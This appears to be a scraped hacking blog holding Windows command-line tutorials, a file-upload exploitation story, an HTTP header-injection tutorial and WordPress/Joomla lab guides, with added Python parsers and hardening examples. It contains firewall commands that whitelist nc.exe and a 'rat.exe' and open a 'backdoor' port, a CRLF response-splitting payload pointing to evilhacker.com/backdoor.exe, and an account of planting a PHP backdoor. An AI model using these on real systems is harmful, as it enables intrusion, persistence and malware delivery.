Windows command line tutorial [part4]

The site moved to root domain where all post are imported. Please go to http://pusheax.com/


You are Expert!!!

TASK
See all processes with their PIDs (process IDs):
tasklist
tasklist /? (shows all options)
Show every DLL loaded by each process:
tasklist /M >pid.txt (output redirected to a text file called "pid.txt")
Show only the processes that have loaded a specified DLL (tasklist /M also takes a module name):
tasklist /M ntdll.dll
Display the services hosted by each process:
tasklist /SVC
Example output:
Image Name PID Services
========================= ====== =============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 552 N/A
csrss.exe 608 N/A
winlogon.exe 632 N/A
services.exe 676 Eventlog, PlugPlay
lsass.exe 688 PolicyAgent, ProtectedStorage, SamSs
vmacthlp.exe 844 VMware Physical Disk Helper Service
svchost.exe 860 DcomLaunch, TermService
svchost.exe 936 RpcSs
svchost.exe 1028 AudioSrv, CryptSvc, Dhcp, dmserver, ERSvc,
EventSystem, FastUserSwitchingCompatibility,
helpsvc, lanmanserver, lanmanworkstation,
Netman, Nla, Schedule, seclogon, SENS,
SharedAccess, ShellHWDetection, srservice,
Themes, TrkWks, W32Time, winmgmt, wscsvc,
wuauserv, WZCSVC
svchost.exe 1076 Dnscache
svchost.exe 1128 LmHosts, RemoteRegistry, SSDPSRV, WebClient
explorer.exe 1476 N/A
spoolsv.exe 1516 Spooler
VMwareTray.exe 1616 N/A
vmtoolsd.exe 1632 N/A
IDMan.exe 1640 N/A
Skype.exe 1648 N/A
IEMonitor.exe 1796 N/A
vmtoolsd.exe 988 VMTools
TPAutoConnSvc.exe 796 TPAutoConnSvc
alg.exe 384 ALG
wscntfy.exe 2096 N/A
TPAutoConnect.exe 2412 N/A
cmd.exe 2760 N/A
wuauclt.exe 3212 N/A
notepad.exe 296 N/A
tasklist.exe 272 N/A
wmiprvse.exe 1612 N/A
The same list in CSV form (easier to parse, filter or import into a spreadsheet):
tasklist /SVC /FO CSV
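To make the CSV form useful, here is a small parser, added to this tutorial rather than taken from the original post, that reads the CSV output, maps each service to its hosting PID, and lists which services share one svchost.exe. That sharing is the reason killing a svchost PID is a bad idea, which matters for the taskkill section that follows. SAMPLE_CSV is constructed from the example output above and trimmed.

```python
import csv
import io

# Constructed sample: what `tasklist /SVC /FO CSV` prints for a few of the
# processes listed in the example output above (trimmed).
SAMPLE_CSV = '''"Image Name","PID","Services"
"System Idle Process","0","N/A"
"services.exe","676","Eventlog,PlugPlay"
"lsass.exe","688","PolicyAgent,ProtectedStorage,SamSs"
"svchost.exe","860","DcomLaunch,TermService"
"svchost.exe","936","RpcSs"
"svchost.exe","1128","LmHosts,RemoteRegistry,SSDPSRV,WebClient"
"spoolsv.exe","1516","Spooler"
"cmd.exe","2760","N/A"
'''


def parse_tasklist_svc(text):
    """Parse `tasklist /SVC /FO CSV` output into (image, pid, [services]) tuples.

    The Services column is a comma-separated list inside one quoted field,
    or the literal N/A for processes that host no service.
    """
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        services = row["Services"]
        svcs = [] if services == "N/A" else [s.strip() for s in services.split(",")]
        rows.append((row["Image Name"], int(row["PID"]), svcs))
    return rows


def service_to_pid(text):
    """Map each service name to the PID of the process hosting it."""
    return {s: pid for _, pid, svcs in parse_tasklist_svc(text) for s in svcs}


def svchost_groups(text):
    """PID -> hosted services for every svchost.exe (shared-process hosts)."""
    return {pid: svcs for image, pid, svcs in parse_tasklist_svc(text)
            if image.lower() == "svchost.exe"}


def cohosted(text, service):
    """Services that share a process with `service`. Killing that PID with
    taskkill takes all of them down, so prefer `sc stop <service>`.
    Returns None when no listed process hosts the service."""
    for _, _, svcs in parse_tasklist_svc(text):
        if service in svcs:
            return [s for s in svcs if s != service]
    return None


def suspicious_svchosts(text):
    """PIDs of svchost.exe instances that host no service at all. The genuine
    svchost.exe is only ever started by the service controller to host
    services, so an instance showing N/A deserves a closer look (image path,
    parent process, command line)."""
    return [pid for pid, svcs in svchost_groups(text).items() if not svcs]


if __name__ == "__main__":
    for pid, svcs in svchost_groups(SAMPLE_CSV).items():
        print("svchost.exe PID %d hosts: %s" % (pid, ", ".join(svcs)))
    print("Killing RemoteRegistry's host also stops:",
          cohosted(SAMPLE_CSV, "RemoteRegistry"))
```

On a live box, feed it the real output with `tasklist /SVC /FO CSV > svc.csv` and read the file; the parser does not care which Windows version produced it as long as the three columns are present.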
TASKKILL
Taskkill is the tool to kill (terminate) a process.
Help:
taskkill /?
Example output:
TASKKILL [/S system [/U username [/P [password]]]]
{ [/FI filter] [/PID processid | /IM imagename] } [/F] [/T]
Description:
This command line tool can be used to end one or more processes.
Processes can be killed by the process id or image name.
Parameter List:
/S system Specifies the remote system to connect to.
/U [domain\]user Specifies the user context under which
the command should execute.
/P [password] Specifies the password for the given
user context. Prompts for input if omitted.
/F Specifies to forcefully terminate
process(es).
/FI filter Displays a set of tasks that match a
given criteria specified by the filter.
/PID process id Specifies the PID of the process that
has to be terminated.
/IM image name Specifies the image name of the process
that has to be terminated. Wildcard ‘*’
can be used to specify all image names.
/T Tree kill: terminates the specified process
and any child processes which were started by it.
/? Displays this help/usage.
Filters:
Filter Name Valid Operators Valid Value(s)
----------- --------------- --------------
STATUS eq, ne RUNNING | NOT RESPONDING
IMAGENAME eq, ne Image name
PID eq, ne, gt, lt, ge, le PID value
SESSION eq, ne, gt, lt, ge, le Session number.
CPUTIME eq, ne, gt, lt, ge, le CPU time in the format
of hh:mm:ss.
hh – hours,
mm – minutes, ss – seconds
MEMUSAGE eq, ne, gt, lt, ge, le Memory usage in KB
USERNAME eq, ne User name in [domain\]user
format
MODULES eq, ne DLL name
SERVICES eq, ne Service name
WINDOWTITLE eq, ne Window title
NOTE: Wildcard ‘*’ for the /IM switch is accepted only with filters.
NOTE: Termination of remote processes will always be done forcefully
irrespective of whether /F option is specified or not.
Examples:
TASKKILL /S system /F /IM notepad.exe /T
TASKKILL /PID 1230 /PID 1241 /PID 1253 /T
TASKKILL /F /IM notepad.exe /IM mspaint.exe
TASKKILL /F /FI “PID ge 1000” /FI “WINDOWTITLE ne untitle*”
TASKKILL /F /FI "USERNAME eq NT AUTHORITY\SYSTEM" /IM notepad.exe
TASKKILL /S system /U domain\username /FI "USERNAME ne NT*" /IM *
TASKKILL /S system /U username /P password /FI “IMAGENAME eq note*”
Kill a process by PID or by image name:
taskkill /PID 296
taskkill /IM notepad.exe
Kill several processes with one command:
taskkill /PID 333 /PID 444 /PID 49494
Add /F when a process ignores the normal termination request, and /T to take its child processes down with it. Note that killing a shared svchost.exe by PID also terminates every other service hosted in that process, so stop individual services with sc stop (below) rather than taskkill.
Starting and Stopping Services
Help:
sc (with no arguments prints the usage)
Stop a service (by its service name, not its display name):
sc stop avp
Start a service:
sc start avp
Query the configuration of a service:
sc qc avp
Example output:
C:\Documents and Settings\Administrator\Desktop>sc qc RemoteRegistry
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: RemoteRegistry
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\system32\svchost.exe -k LocalService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Remote Registry
DEPENDENCIES : RPCSS
SERVICE_START_NAME : NT AUTHORITY\LocalService
Change the configuration of a service (the service name is required, and the space after "start=" is mandatory):
sc config avp start= disabled
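Here is a parser for that output, added to this tutorial as an example and not taken from the original post. It turns the fields of `sc qc` into a dict and applies the checks a pentester runs on every service: an unquoted image path containing spaces, a LocalSystem identity, and automatic start. The first sample is the RemoteRegistry output above; the second, ExampleSvc, is a constructed hypothetical service and not something from this page.

```python
import re

# Constructed sample 1: the RemoteRegistry output shown above, as sc prints it.
SC_QC_REMOTEREGISTRY = r"""[SC] GetServiceConfig SUCCESS

SERVICE_NAME: RemoteRegistry
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\system32\svchost.exe -k LocalService
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Remote Registry
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : NT AUTHORITY\LocalService
"""

# Constructed sample 2: a hypothetical third-party service (not from the post)
# that has the properties the checks below look for.
SC_QC_EXAMPLE = r"""[SC] GetServiceConfig SUCCESS

SERVICE_NAME: ExampleSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Example Vendor\svc.exe -run
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Example Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")


def parse_sc_qc(text):
    """Turn `sc qc <name>` output into a dict of FIELD -> value."""
    cfg = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg


def executable_path(binary_path_name):
    """Extract the image path from BINARY_PATH_NAME. A quoted path ends at
    the closing quote; otherwise take everything up to the first '.exe'
    (arguments such as '-k LocalService' follow it)."""
    if binary_path_name.startswith('"'):
        return binary_path_name[1:binary_path_name.find('"', 1)]
    m = re.match(r"(.*?\.exe)", binary_path_name, re.IGNORECASE)
    return m.group(1) if m else binary_path_name.split(" ")[0]


def search_prefixes(binary_path_name):
    """Paths Windows tries, in order, when an unquoted image path contains
    spaces: each space-delimited prefix with '.exe' appended, then the full
    path. A writable directory anywhere along that chain lets a local user
    plant a binary the service controller runs with the service's identity.
    Check the directory ACLs (icacls) before calling it a finding."""
    exe = executable_path(binary_path_name)
    if binary_path_name.startswith('"') or " " not in exe:
        return [exe]
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [exe]


def review(cfg):
    """Findings a pentester wants from one `sc qc` result."""
    findings = []
    path = cfg.get("BINARY_PATH_NAME", "")
    if not path.startswith('"') and " " in executable_path(path):
        findings.append("unquoted image path with spaces")
    if cfg.get("SERVICE_START_NAME", "").lower() in ("localsystem", ".\\localsystem"):
        findings.append("runs as LocalSystem")
    if cfg.get("START_TYPE", "").endswith("AUTO_START"):
        findings.append("starts automatically at boot")
    return findings


if __name__ == "__main__":
    for sample in (SC_QC_REMOTEREGISTRY, SC_QC_EXAMPLE):
        cfg = parse_sc_qc(sample)
        print(cfg["SERVICE_NAME"], review(cfg), search_prefixes(cfg["BINARY_PATH_NAME"]))
```

To review every service at once, loop over the names from `sc query state= all` and feed each `sc qc` output through `parse_sc_qc`.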
There are many more commands than these; I did not write up every command here. You need to practise, search Google, and so on. There is a more powerful game to play with "wmic" and other commands which I did not explain here. If you want me to write more tutorials, have any feedback, or want a tutorial on something else, please visit http://www.c0nnect3d.blogspot.com and post your question. I will happily help you.
Thanks

Windows command line tutorial [part3]



The Firewall
"netsh" is the tool for configuring the Windows firewall (among many other things).
We can configure the firewall from the command line (cmd.exe) easily. Some firewall commands are included below. Note: the "netsh firewall" context is the Windows XP/2003 one; from Windows Vista onwards it is deprecated and the same work is done in "netsh advfirewall firewall".
Help:
netsh (then type "help" at the netsh> prompt)
or
netsh firewall ?
Show the current configuration of the firewall:
netsh firewall show config
The firewall "set" command:
(This changes firewall settings, for example whether it is on and which programs and services it allows.)
netsh firewall set ? (see the help)
Enable the firewall:
netsh firewall set opmode enable
ICMP settings (type 8 is echo request, i.e. allow ping; mode defaults to enable):
netsh firewall set icmpsetting 8
or
netsh firewall set icmpsetting type=all mode=enable
Firewall services:
netsh firewall set service type=REMOTEADMIN mode=enable scope=CUSTOM address=ip.ip.ip.ip
netsh firewall set service REMOTEDESKTOP ENABLE
Adding new exceptions (the "add" command):
netsh firewall add ? (for help)
netsh firewall add allowedprogram c:\somewhere\nc.exe virus ENABLE
netsh firewall add allowedprogram program=c:\somewhere\something\rat.exe name=legit mode=enable
Open a port:
netsh firewall add portopening TCP 1337 backdoor
netsh firewall add portopening protocol=TCP port=31337 name=another mode=ENABLE scope=CUSTOM address=ip.ip.ip.ip profile=ALL interface="Local Area Connection"
Delete an allowed program:
netsh firewall delete allowedprogram c:\somewhere\something\virus\nc.exe
netsh firewall delete allowedprogram program=c:\here\1337\deletethehacker\bye.exe profile=ALL
Restore the default Windows firewall configuration:
netsh firewall reset
Every one of these changes is persisted in the registry: on a pentest, record what you add so you can delete it again afterwards, and when you are defending, remember that an attacker's persistence looks exactly like the "allowedprogram" and "portopening" lines above.

Exploiting file upload vulnerability


I did my job very quickly after finding a file upload vulnerability in a website. I was pentesting a network remotely (black-box testing) and it was really hard. I often browsed their website. I was not even able to ping their IP because of the firewall. The only things left for me to do were social engineering and web pentesting (really, I was confused!!! If the SE and web hacking methods did not work then perhaps my heart was about to be attacked!!! lol (my heart is not weak)). Anyway, I scanned the site with various vulnerability scanners... no luck!!! So I started browsing the site manually (and Google searching randomly; truthfully I didn't know what to look for).

Suddenly I found a personal file upload link, which was hell to find, but my Google friend helped me a lot. The link was like: www.hired-me.org/test/personal/re_al/file2010.php . It accepted only 3 file extensions: JPEG, TEXT, CSV. At first I did not think that this link had any vulnerability (already confused by the fucking scanner!!!).

How I exploited it:

First I uploaded a JPEG file and tried to find the location where it was saved. That was also hard (my knowledge sucks?). OK, at least I found the JPEG file located at www.hired-me.com/index/hidden/director/test.jpeg , everything OK. Now I quickly created a PHP file [test.php]:

<?php
echo "This is test";
?>

I quickly tried to upload "test.php" and "test.jpeg.php" but got the error "Unknown File Extension". This error made me sure that the file extension was filtered.

Again I renamed "test.php" to "test.php.jpeg". Now no error!!! wow!!
I quickly checked www.hired-me.com/index/hidden/director/test.php.jpeg and the page displayed "This is test". Now I decided to upload a real PHP backdoor. Then I uploaded some rooting tools, then created SSH access and compromised two additional machines. Job done!!!
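To see why the rename worked and what the filter should have done, here is an added example, my code and not the author's or the target's: the weak last-extension check the post describes, the Apache multi-extension behaviour that is the likely reason test.php.jpeg executed (an assumption, since the post does not name the web server), and a hardened upload handler that whitelists a single extension, checks the JPEG magic bytes and stores the file under a server-chosen random name.

```python
import os
import secrets

ALLOWED = {"jpeg", "jpg", "txt", "csv"}
JPEG_MAGIC = b"\xff\xd8\xff"


def accepted_by_weak_filter(filename):
    """The check the target appears to have used: only the text after the
    last dot is compared with the whitelist. test.php and test.jpeg.php are
    rejected, test.php.jpeg is accepted."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ALLOWED


def apache_treats_as_php(filename):
    """Why test.php.jpeg still ran: with `AddHandler application/x-httpd-php .php`
    Apache matches every extension segment of a multi-extension name, so a
    '.php' anywhere after the first dot hands the file to mod_php. (This is an
    assumption about the target's server, which the post does not name.)"""
    segments = filename.split(".")[1:]
    return "php" in (s.lower() for s in segments)


def safe_stored_name(filename, content):
    """Hardened handler: reject names with more than one extension or with an
    extension outside the whitelist, verify the JPEG magic bytes, and store
    the file under a random name chosen by the server, so no attacker-chosen
    name ever reaches the filesystem. Returns the name to store under, or
    None to reject the upload."""
    base = os.path.basename(filename)  # drop any directory part
    if base.count(".") != 1:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return None
    if ext in ("jpeg", "jpg"):
        if not content.startswith(JPEG_MAGIC):
            return None
        ext = "jpg"
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    for name in ("test.php", "test.jpeg.php", "test.php.jpeg", "photo.jpeg"):
        print(name, "weak filter accepts:", accepted_by_weak_filter(name),
              "Apache runs as PHP:", apache_treats_as_php(name))
    print("hardened stores photo.jpeg as:",
          safe_stored_name("photo.jpeg", JPEG_MAGIC + b"\xe0"))
    print("hardened stores test.php.jpeg as:",
          safe_stored_name("test.php.jpeg", JPEG_MAGIC + b"\xe0"))
```

The rename is only half of the fix: the upload directory must also be served with script execution off (`php_flag engine off` in Apache, or a location outside the web root served through a download script), so that even a file the checks let through is never executed.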

Feedback are welcome!!!


HTTP header injection


If we can inject a newline into a header we control, then we can insert additional HTTP headers and some nasty body text. I don't think we can compromise a website/server via this vulnerability alone, but it is still powerful for social engineering attacks, phishing, redirecting to a malicious site, downloading a backdoor, virtual defacement, sometimes injecting cookies, etc. It is much like XSS.

Basically this vulnerability is found where user input is copied into response headers such as "Set-Cookie" and "Location". If we connect to a website:

nc -vv target.com 80
GET /something.php?id=1&pay=40000&method=credit HTTP/1.1
Host: target.com
(then an empty line to end the request)
After this GET request we get a response whose headers contain something like (look for it):

Set-Cookie: PaymentMethod=credit

If this is the behaviour of the host then we should try to insert a carriage return and line feed (%0d%0a, which the server URL-decodes to a real CR LF before copying the value):

nc -vv target.com 80
GET /something.php?id=1&pay=40000&method=credit%0d%0ait-is=vulnerable HTTP/1.1
Host: target.com

If the host is vulnerable then it replies with an additional header line "it-is=vulnerable", like this:

Set-Cookie: PaymentMethod=credit
it-is=vulnerable

A hacker can also push a whole fake response body and force users to download a backdoor. The injected Content-Length must equal the length of the injected body (80 bytes for the HTML below) so that the browser renders only the attacker's HTML and ignores the real body that follows; spaces and angle brackets in the URL must be URL-encoded:

http://target.com/something.php?id=1&pay=40000&method=credit%0d%0aContent-Length:%2080%0d%0a%0d%0a%3Chtml%3E%0d%0a%3Ca%20href=www.evilhacker.com/backdoor.exe%3EPlease%20update%20first%3C/a%3E%0d%0a%3C/html%3E
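The exchange described above, as an added example that is not part of the original post: a minimal vulnerable response builder that copies the query value into Set-Cookie, the same builder with the CR/LF check that fixes it, and a client-side split that shows what a browser honouring the injected Content-Length would render. The cookie name, the probe and the backdoor URL are the ones from the text; the rest of the response layout is assumed, and the Content-Length is computed from the HTML so the two always agree.

```python
from urllib.parse import quote, unquote

CRLF = "\r\n"


def decode_query_value(raw):
    """What the application sees once the web server URL-decodes the
    parameter: %0d%0a becomes a real carriage return and line feed."""
    return unquote(raw)


def build_response_vulnerable(method):
    """Response as the post's target appears to build it: the PaymentMethod
    value is copied straight into Set-Cookie. A CR LF inside the value ends
    that header early, and whatever follows is read as more headers or, after
    a blank line, as the body."""
    headers = [
        "HTTP/1.1 200 OK",
        "Content-Type: text/html",
        "Set-Cookie: PaymentMethod=" + method,
    ]
    return CRLF.join(headers) + CRLF + CRLF + "<html>thank you</html>"


def build_response_hardened(method):
    """Same response with the header value validated first. Framework header
    APIs normally do this for you (Django raises BadHeaderError on a newline,
    for example); when headers are written by hand, this check is the fix."""
    if any(ch in method for ch in "\r\n\x00"):
        raise ValueError("refusing CR/LF in header value")
    return build_response_vulnerable(method)


def parse_response(raw):
    """Split a raw response the way a client does: status line, header lines,
    and body (everything after the first blank line)."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    return lines[0], lines[1:], body


def body_as_rendered(raw):
    """The body a browser that honours Content-Length renders: when the
    injected header is present, only that many bytes, so the real body the
    server appends afterwards is never shown."""
    _, headers, body = parse_response(raw)
    for h in headers:
        name, _, value = h.partition(":")
        if name.strip().lower() == "content-length":
            return body[:int(value.strip())]
    return body


# The probe from the text, as it travels in the query string.
PROBE = "credit%0d%0ait-is=vulnerable"

# The second payload from the text: a fake Content-Length plus the attacker's
# HTML, URL-encoded the way a browser would send it.
ATTACKER_HTML = ("<html>" + CRLF
                 + "<a href=www.evilhacker.com/backdoor.exe>Please update first</a>" + CRLF
                 + "</html>")
SPLIT_PAYLOAD = ("credit%0d%0aContent-Length:%20" + str(len(ATTACKER_HTML))
                 + "%0d%0a%0d%0a" + quote(ATTACKER_HTML, safe="/="))


if __name__ == "__main__":
    print(parse_response(build_response_vulnerable(decode_query_value(PROBE)))[1])
    print(body_as_rendered(build_response_vulnerable(decode_query_value(SPLIT_PAYLOAD))))
```

When testing a real target with nc, send the decoded value through the URL-encoded form exactly as SPLIT_PAYLOAD does; a raw space or angle bracket on the request line makes the server reject the request before the vulnerable code ever sees it.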

We can also create a fake cookie and send the URL to the poor victim. Just think smartly and you will find other ways 😉

Be aware!!!

Windows command line tutorial [part2]



Some Advanced Things
Who am I:
echo %username% (or whoami, where that tool is installed)
Where am I (the pwd equivalent):
cd (with no argument prints the current directory; echo %cd% does the same. echo %path% prints the executable search path, not your location)
What is the computer name:
echo %computername%
How many files are in a directory (the "find" command counts the lines):
dir /b c:\somewhere | find /c /v ""
Starting a service:
sc start some-service
Finding a specific file in a directory tree:
dir /b /s c:\ | find "notepad.exe" or
dir /b /s c:\some.txt
The findstr command is used to find specific lines:
findstr "user" c:\username\password\pass.sql
Note: "findstr /?" for more help.
How many lines in a file:
find /c /v "" c:\username\password\pass.sql
How many lines match a pattern across a directory tree:
findstr /s "something" c:\username\* | find /c /v ""
More Advanced
User management and networking:
PLAYING WITH USERS:
net (with no arguments lists the subcommands)

See all current user names:
net user
Add a user:
net user username password /add
Delete the user:
net user username /delete
See all current local groups:
net localgroup
Add a user to the Administrators group:
net localgroup Administrators username /add
Remove the user from the Administrators group:
net localgroup Administrators username /delete
Running a command as administrator:
runas /user:administrator c:\windows\system32\nc.exe
See the account policy:
net accounts
Set an account policy (MINPWLEN accepts 0 to 14, MAXPWAGE and MINPWAGE are in days):
net accounts /MINPWLEN:12 /MAXPWAGE:30 /MINPWAGE:3
PLAYING WITH THE NETWORK:
SMB shares (connect to a remote share with explicit credentials):
net use \\ip.ip.ip.ip\share passw0rd /user:username
net use \\ip.ip.ip.ip\c$ passw00rd /user:administrator
Shared paths:
net share (see which paths this machine shares)
File Transfer Protocol:
ftp microsoft.com
IPCONFIG (the ifconfig of Windows):
ipconfig (see the network information and IP address)
ipconfig /all (see all network information for all interfaces).

Windows command line tutorial [part1]


Are you a penetration tester or a system administrator? How much Windows command line knowledge do you have? Hey, don't start laughing ;). As an expert system administrator you must have some command line knowledge, and if you are a penetration tester then this is your first way in.... no?
Anyway, I will try to write up most of the Windows commands which may help you. But remember that I will not explain them in detail, because that would take a very long time, so you should try them in practice (VMware installed?). I hope you have some good logic too (if not, how can we think like a genius?? hehe).
Think of these as practical examples rather than a tutorial; you need to practise them yourself.


I hope you know how to open cmd.exe (Start >> Run >> cmd, and hit ENTER).

If you type 'help' you get all possible commands to execute. But do you know exactly how to work with these commands effectively?
If you want to open another cmd then just run "cmd" or "start cmd".
Make a directory:
mkdir c:\admin
change to the directory:
cd c:\admin
deleting a file:
del c:\web\index.asp
reading a file from the command line:
type c:\admin\some.txt
writing a file:
echo "<html>" > test.html
echo "<body>">>test.html
echo "<p>this is test as a system admin</p>" >>test.html
echo "</body></html>" >>test.html
now try to see the file: type test.html
removing a directory:
rmdir c:\admin, or rmdir /S c:\admin to remove the directory together with everything in it.
Much garbage in your console, so clear it:
cls
How many directories?:
See how many directories are in the current directory.
dir

see how many directories are in c:\windows\system32.
dir "c:\windows\system32"
Hidden directories:

See all hidden directories in a specified path.
dir /aHD c:\windows\system32

Copy a file:
copy c:\win.ini c:\admin\here\win.txt

for a directory tree or file:
xcopy e:\somedirectory f:\somewhere\copy

moving a file permanently and renaming it at the same time:
move c:\admin\here\win.txt c:\admin\win.old
error redirecting:
app.exe 2>error.txt
Open error.txt with "type error.txt" or "notepad error.txt"
Multiple commands ("||" runs the next command only if the previous one failed, "&&" only if it succeeded, "&" unconditionally):
move filetomove c:\path || telnet microsoft.com 80
anycommand || dir || more-command
type somefile.txt & cmd.exe or type somefile.txt && cmd.exe

paginate long output:
dir c:\windows\system32 | more    (you have to hit Enter to page through)
local time:
time /t (shows the time; plain time prompts you to set it; time /t & exit shows the time and then exits the cmd)

Install Joomla and do the practice


We have installed WordPress, which is really very easy to install. Now I am going to show you how to install Joomla. I think you are smart enough to understand why we need Joomla, WordPress or other such things. Let's start,

Download Joomla from http://www.joomla.org/download.html

It is a zip file. Extract it the same way as I did for WordPress.

We need to install apache2 php5-mysql libapache2-mod-php5 mysql-server

Some of them we already installed when we installed WordPress

So simply:

apt-get install libapache2-mod-php5
Now we need to configure the MySQL server for Joomla.

Here is the screenshot:

Please type the commands by hand instead of copying and pasting (hehe). You can also see 3 errors in this screenshot, which are juicy for a hacker: whenever you give a bad command you will get an error like this.
We are ready to go,
Browse to http://localhost/joomla/installation/ and click "Next":


In the next stage you will see another window, which checks that all dependencies are present. Make sure they are:


OK, click "Next"

Now it should display the license agreement. Again click "Next"


Now it should display a page for configuring the database. Configure it like this:


Warning: You should not use the root user for the database if you are following this guide for business purposes; create a dedicated MySQL user with rights on the Joomla database only.
OK, now click "Next"

Now you will get the FTP server configuration. If you do not wish to use the FTP service then just click "Next"



This is the last step:



Now just: rm -r /var/www/joomla/installation (Joomla will not run until this directory is gone, and leaving it in place would let anyone reach the installer).
DONE!

Default admin page: http://localhost/administrator




Good Luck!!!


Install WordPress(Default) and do the practice


You should not run any hacking tools against, or attempt to hack, third-party websites; that may bring some danger for you. Also, some people do not even know how to create their own website for testing purposes or even for serious business. So I will explain how we can install our own web software such as WordPress, phpBB, MyBB, Joomla etc. Installing this software is very easy. Let's start.

(NOTE: You need the following things for this to work.)

WordPress:

You need to install MySQL, Apache, PHP and php-gd

Currently I am using Kubuntu. If you are also running Kubuntu or Ubuntu then run:

apt-get install apache2 mysql-server php5 php-gd php5-mysql libapache2-mod-php5

Specify your MySQL password when asked. Remember that this becomes the MySQL root password (be aware!!!).

Download WordPress from their site (http://wordpress.org/latest.zip) with the command wget -c http://wordpress.org/latest.zip.

root@security:~/Desktop/Web software# cp wordpress-3.2.zip /var/www

root@security:/var/www# unzip wordpress-3.2.zip
root@security:/var/www# cd wordpress
Now we need to create "wp-config.php" from the sample file:
root@security:/var/www/wordpress# cp wp-config-sample.php wp-config.php

Now we edit it,

root@security:/var/www/wordpress# nano wp-config.php

we just need to edit some simple things:

define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Insert_your_username_here');

/** MySQL database password */
define('DB_PASSWORD', 'and_Password_of_Mysql');

Screenshot:

One question: are you sure that you have a database named "wordpress"? I don't think so. So create the database first (CREATE DATABASE wordpress; in the mysql client, ideally owned by a dedicated user rather than root), otherwise the installation will fail:

GOOD !!! now you are ready to go …

Just visit: http://localhost/wordpress/wp-admin/install.php (or use the IP) and you will see:

Simply fill in the form and click the "Install" button.

Good!! You have just installed WordPress:

Click on the "Log in" button for WordPress administration.

Now enjoy, and practise security on your own site.

Next we will install Joomla.